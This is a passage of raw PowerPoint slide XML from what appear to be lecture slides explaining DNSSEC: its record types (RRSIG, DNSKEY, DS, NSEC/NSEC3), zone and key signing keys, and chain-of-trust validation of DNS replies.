              <a:rPr sz="3467" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>browsers.</a:t>
            </a:r>
            <a:endParaRPr sz="3467">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7156A-BB43-4469-A73B-1644914A419D}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66562" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{970295FE-EB81-1171-86C7-27457163842D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="228600"/>
            <a:ext cx="8229600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DNSSEC (DNS Security Extensions)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{118BF432-5294-2FA0-D2DC-3C63F913B35C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1197205" y="1219200"/>
            <a:ext cx="10558020" cy="4681979"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Extends DNS with new record types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK"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RRSIG</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK"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Contains digital signatures for DNS records.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK"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PK" altLang="en-PK" sz="19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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK"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DNSKEY</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK"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Public keys for validating signatures.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="19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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK"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DS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK"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Delegation Signer for public keys in delegated zones </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-PK"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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>First version in ‘97, revised by ’05</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>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Deployment requires software upgrade at both client and server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Root servers upgraded in 2010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Followed by uptick in deployment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EB4E2DF-8290-1234-65BF-A0A7CFDAFF64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F75E10C-4C9F-9FCA-DBD5-43511A1D312B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A13B892-3325-4BE8-98BF-F570EF9ADEAD}"/>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5689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DNSSEC (2) – New Records</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650450" y="914400"/>
            <a:ext cx="11340445" cy="4873659"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>As well as the usual A, NS records</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>RRSIG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Digital signatures of domain records</a:t>
            </a:r>
            <a:endPar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 digital signature for a set of DNS records (e.g., A, NS).</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Verifies the integrity and authenticity of the records.</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The corresponding public key for validation is in the </a:t>
            </a:r>
            <a:r>
              <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DNSKEY</a:t>
            </a:r>
            <a:r>
              <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record. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DNSKEY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Public key used for domain RRSIGs (for validation of signatures)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Two types of keys:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Zone Signing Key (ZSK)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: Signs the zone’s records.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Key Signing Key (KSK)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: Signs the DNSKEY record itself</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Purpose: Links a parent DNS zone to a child zone by signing the child zone’s DNSKEY.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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Links a parent zone to its child zone by signing the child’s DNSKEY.</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the chain of trust across the DNS hierarchy. </a:t>
            </a:r>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NSEC/NSEC3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Authenticated denial of existence (answer from an authoritative NS that really there is no domain)</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71773" y="6438900"/>
            <a:ext cx="478808" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108206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90221" y="2667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DNSSEC (3) – Validating Replies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1244338" y="1491005"/>
            <a:ext cx="10322350" cy="4757395"/>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Clients perform usual DNS queries but validate responses using:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Trust Anchors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Public keys of root DNS servers, configured in the client.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Trust propagates through the DNS hierarchy (e.g., root → TLD → domain).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Similar concept to SSL certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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1026" name="Picture 2" descr="DNS namespace">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07F55B92-9C12-F256-9EBA-957787C5E8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91" t="11048" r="1751" b="17643"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7271209" y="4676901"/>
            <a:ext cx="4920791" cy="1517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791DAD-9085-AFC5-9005-F6327B2D5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462" y="4333939"/>
            <a:ext cx="4661598" cy="252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9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DNSSEC (4) – Validating Replies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1454084" y="990600"/>
            <a:ext cx="7772400" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Client queries www.uw.edu as usual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Replies include signatures/keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Client validates answer:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1. KROOT is a trust anchor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2. Use KROOT to check KEDU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3. Use KEDU to check KUW.EDU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4. Use KUW.EDU to check IP</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7810361" y="854075"/>
            <a:ext cx="3600450" cy="3648075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="AutoShape 2" descr="DNSSEC validation process">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F08494B-478A-EFF5-B7A1-EAA22FE2C3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DNSSEC validation process">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D42F7383-4ADC-5A6D-F8EB-33D2371B690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AutoShape 2" descr="What is DNSSEC? ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6EC1F6D-AF65-F07E-9D41-769453BED6B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51147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9E9A-6AD0-0502-B944-BCB27D710FE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="583677" y="110601"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DNSSEC (4) – Validating Replies</a:t>
            </a:r>
            <a:endParaRPr lang="en-PK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAAA2A51-E3EB-6E19-44A3-EF7CE0F4EA7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="339363" y="1252624"/>
            <a:ext cx="6955411" cy="5494775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD4CB43E-DC33-C5CF-779C-694F123DAB76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect t="46806" r="91"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7378047" y="2578187"/>
            <a:ext cx="4474590" cy="2512160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228064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NSSEC process and terminologies - DNSSEC process and terminologies">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A083743-23D2-F45E-28EC-614AA5E5F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0"/>
            <a:ext cx="10596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4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DNSSEC (5)</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199"/>
            <a:ext cx="9942922" cy="4889369"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Other features too:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Authoritative answers a domain record doesn’t exist (NSEC/NSEC3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>If a query for fake.example.com is made, NSEC/NSEC3 can confirm that no such record exists in example.com.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-PK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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Optional anti-spoofing to bind query and reply</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Flags related to deployment …</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7421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Summary</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DNS spoofing is possible without added security measures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Large problem in practice!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DNSSEC adds authentication (only) of replies to the DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Using a hierarchy of public keys</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7215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05000" y="381000"/>
            <a:ext cx="7772400" cy="579438"/>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This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marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
